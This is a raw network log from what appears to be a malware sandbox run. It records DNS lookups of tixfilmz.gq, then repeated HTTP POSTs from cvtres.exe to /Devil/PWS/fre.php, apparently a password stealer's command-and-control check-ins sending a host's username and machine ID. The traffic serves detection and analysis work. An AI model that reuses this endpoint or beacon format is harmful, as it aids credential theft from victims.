Aug 11, 2022 06:43:47.313312054 CEST	8.8.8.8	192.168.2.3	0xc54d	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:47.313312054 CEST	8.8.8.8	192.168.2.3	0xc54d	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:48.382242918 CEST	8.8.8.8	192.168.2.3	0x4ed0	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:48.382242918 CEST	8.8.8.8	192.168.2.3	0x4ed0	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:49.993833065 CEST	8.8.8.8	192.168.2.3	0x67d6	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:49.993833065 CEST	8.8.8.8	192.168.2.3	0x67d6	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:51.615442038 CEST	8.8.8.8	192.168.2.3	0x376f	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:51.615442038 CEST	8.8.8.8	192.168.2.3	0x376f	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:53.284096956 CEST	8.8.8.8	192.168.2.3	0xe2e0	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:53.284096956 CEST	8.8.8.8	192.168.2.3	0xe2e0	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:54.309494972 CEST	8.8.8.8	192.168.2.3	0x102b	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:54.309494972 CEST	8.8.8.8	192.168.2.3	0x102b	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:55.353864908 CEST	8.8.8.8	192.168.2.3	0x84b8	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:55.353864908 CEST	8.8.8.8	192.168.2.3	0x84b8	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:58.309959888 CEST	8.8.8.8	192.168.2.3	0x312e	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:43:58.309959888 CEST	8.8.8.8	192.168.2.3	0x312e	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:00.108901978 CEST	8.8.8.8	192.168.2.3	0x8ca9	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:00.108901978 CEST	8.8.8.8	192.168.2.3	0x8ca9	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:01.736135960 CEST	8.8.8.8	192.168.2.3	0x158e	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:01.736135960 CEST	8.8.8.8	192.168.2.3	0x158e	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:03.434765100 CEST	8.8.8.8	192.168.2.3	0xe735	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:03.434765100 CEST	8.8.8.8	192.168.2.3	0xe735	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:04.894697905 CEST	8.8.8.8	192.168.2.3	0xfad3	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:04.894697905 CEST	8.8.8.8	192.168.2.3	0xfad3	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:06.132136106 CEST	8.8.8.8	192.168.2.3	0xe3c7	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:06.132136106 CEST	8.8.8.8	192.168.2.3	0xe3c7	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:07.762610912 CEST	8.8.8.8	192.168.2.3	0x9e07	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:07.762610912 CEST	8.8.8.8	192.168.2.3	0x9e07	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:08.800934076 CEST	8.8.8.8	192.168.2.3	0xc274	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:08.800934076 CEST	8.8.8.8	192.168.2.3	0xc274	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:09.882337093 CEST	8.8.8.8	192.168.2.3	0x366b	No error (0)	tixfilmz.gq	188.114.97.3	A (IP address)	IN (0x0001)
Aug 11, 2022 06:44:09.882337093 CEST	8.8.8.8	192.168.2.3	0x366b	No error (0)	tixfilmz.gq	188.114.96.3	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

tixfilmz.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49742	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:12.661274910 CEST	1026	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 190 Connection: close
Aug 11, 2022 06:42:12.678615093 CEST	1026	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz992547DESKTOP-716T771k08F9C4E9C79A3B52B3F739430UoSRS
Aug 11, 2022 06:42:12.770203114 CEST	1027	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EcIokiggUeWK7stOcHYaTR9Nfu%2Bw1B0KmIgjz5XBrLi5RlXYADH7OvXr%2FdJTFK4ComS7WX9Kl%2BawzsVO2xC9i7YvxqK%2B2HlQKPAZKDJzBamMX%2Fg9bDYXNFLl8qJ2TA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4da52d366927-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49743	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:14.045455933 CEST	1028	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 190 Connection: close
Aug 11, 2022 06:42:14.062895060 CEST	1028	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz992547DESKTOP-716T771+08F9C4E9C79A3B52B3F739430PUvyv
Aug 11, 2022 06:42:14.156966925 CEST	1029	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjmr%2BbPvZ8rJwWgffZI2qiEiavpl6O22f%2BcT7CB7tnbyuPOA357Zf2FNxPVWIvbMb8Ndmpi8h9MOOPpjYMpVs8g7ts%2B3HNgz92kV0CK9kX0Lqi1trxOEgmN37zwvtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dadc8f29a21-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49752	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:24.044622898 CEST	1045	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:24.061861992 CEST	1045	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:24.175990105 CEST	1045	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxjXC6ddbJvscFIvG67IgynL2NjLWwlHrf9JNEEpnZhz8GESrErKZ%2BoLBEDeoVxgiwJfVn0Q6Rqu8otxBsF8PXAbqITi5CmVFXMAKxISbPKHDQgqi9tRB4N6epT2qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dec49fdbb79-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49753	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:25.207102060 CEST	1047	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:25.223962069 CEST	1047	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:25.319336891 CEST	1048	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tZTVwoY2KgEFJBINwtqpf4sdTlqYetdrjrRijQZX5Mweayj6DCpYK6tzY8LykMUrMSDsSPGBVilViH644WA9fbXc0g6ig6D5Ubp07wbwXjkLbh86zB8cT4bqPxyqsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4df39917927a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49754	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:26.308314085 CEST	1049	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:26.325208902 CEST	1049	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:26.415497065 CEST	1050	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DLqIBQAFj4gswdHMZuHcj91in6E5f6X3rFMoKk2nEIGUMSZ2Nxf9I4OnjRKO0naduLb%2BueBvh97gRd%2BU%2FaetEzg1vRoUKSp6dcqJzvCnpBITGp00qUPZwKWw%2Bj2BeQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dfa7bdcbb7a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49755	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:27.395951986 CEST	1051	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:27.413217068 CEST	1051	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:27.495721102 CEST	1052	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjqGLd6i9zMP8bcIwUWRGVed2wLUSsm3niQjeu0rUJ%2FcbE6oMHKVIi%2BOomjB7LoB%2F4A1uT%2BXqpcZ%2BWLmbZT%2B4dqHCLfO7Pfl1GolCHzGQ5dzsPMqGjmZ7b6xaz7QbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e013cb5693a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49756	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:28.447484016 CEST	1052	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:28.464462996 CEST	1053	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:28.548753977 CEST	1053	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DT2h4w8l%2FP6VjmZr53R42CuyMFDOYqdNxPcSNr2UXMwc5QDOgwXzVoomGjhqGdK%2BBspu1iOAHpJuUv%2BjCNwmP8uG1MIyC10AF9Et%2FDju8VAihCOxHNiSXGyG%2BZWINg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e07da98929c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49757	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:29.610435963 CEST	1054	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:29.627373934 CEST	1055	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:29.709315062 CEST	1055	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6a1VTXiCKYgnYEO3%2BLpn9oT%2BJ3bOdwQwxtmEYnRXBoF1b2vToJ1LtvkZ1ubI9oYCjF4ZxHdY27qlfBR97QKEKZpuLDGAPkXyaO5gRLySOhDtATM7v%2Bp%2B2VfFc2lo9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e0f190d9119-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49758	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:30.656105042 CEST	1056	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:30.672983885 CEST	1056	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:30.750089884 CEST	1057	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pD6Ln9hJRHjfUxa%2BWE43LFbFNzvbGolnLYC5OP0S2USHgWDZw%2FHEYVnJyWrqjinKtzJoFB9DDiks%2BfRYqYcO6kXROO6nZQW0t1xoGJxTokqwElIuBPwLJT667KYPdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e159a1e915c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49759	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:31.695873976 CEST	1058	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:31.719686031 CEST	1058	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:31.798857927 CEST	1059	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LklYK3MOypuF1%2BVh2sdCtr7LVNtvn%2F19I6qHXiEHaYlXr1GlNl5FV85gZ1YwjH%2BWP3mMaxA%2FOiai0RRg1k%2FJj1BTJT0GFYgOIysXL7HlbvsawYmrc2QRDHTejstVTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e1c1b099182-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49760	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:32.923604012 CEST	1060	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:32.941155910 CEST	1060	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:33.030349016 CEST	1061	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JvllRByjfWTtFWpXg1mKOcP73Q4nqUNK9RIelUCIa9JSpEbSgDMsJfWvwFLMqFKuhwzLWUjzARThWb5gHEZ%2B2nNJeog1S%2BjB0M5cAqiaMNoKriWuzsc3a6MuwY9C4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e23c9e2995a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49761	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:34.002289057 CEST	1062	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:34.019488096 CEST	1062	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:34.089981079 CEST	1063	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HH6Mm6OzeElam41sNPkt1IqJqvterxwkCTH6ccOLDK2%2FP45mgrw2tmT%2FgIuKaBnXiwgm7yZxh1c1twzMg8H%2BZxDubCT3iEDeETTRJWPEP0dPg7eaMyzfviA1nd6Nhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e2a8f32bbd9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49744	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
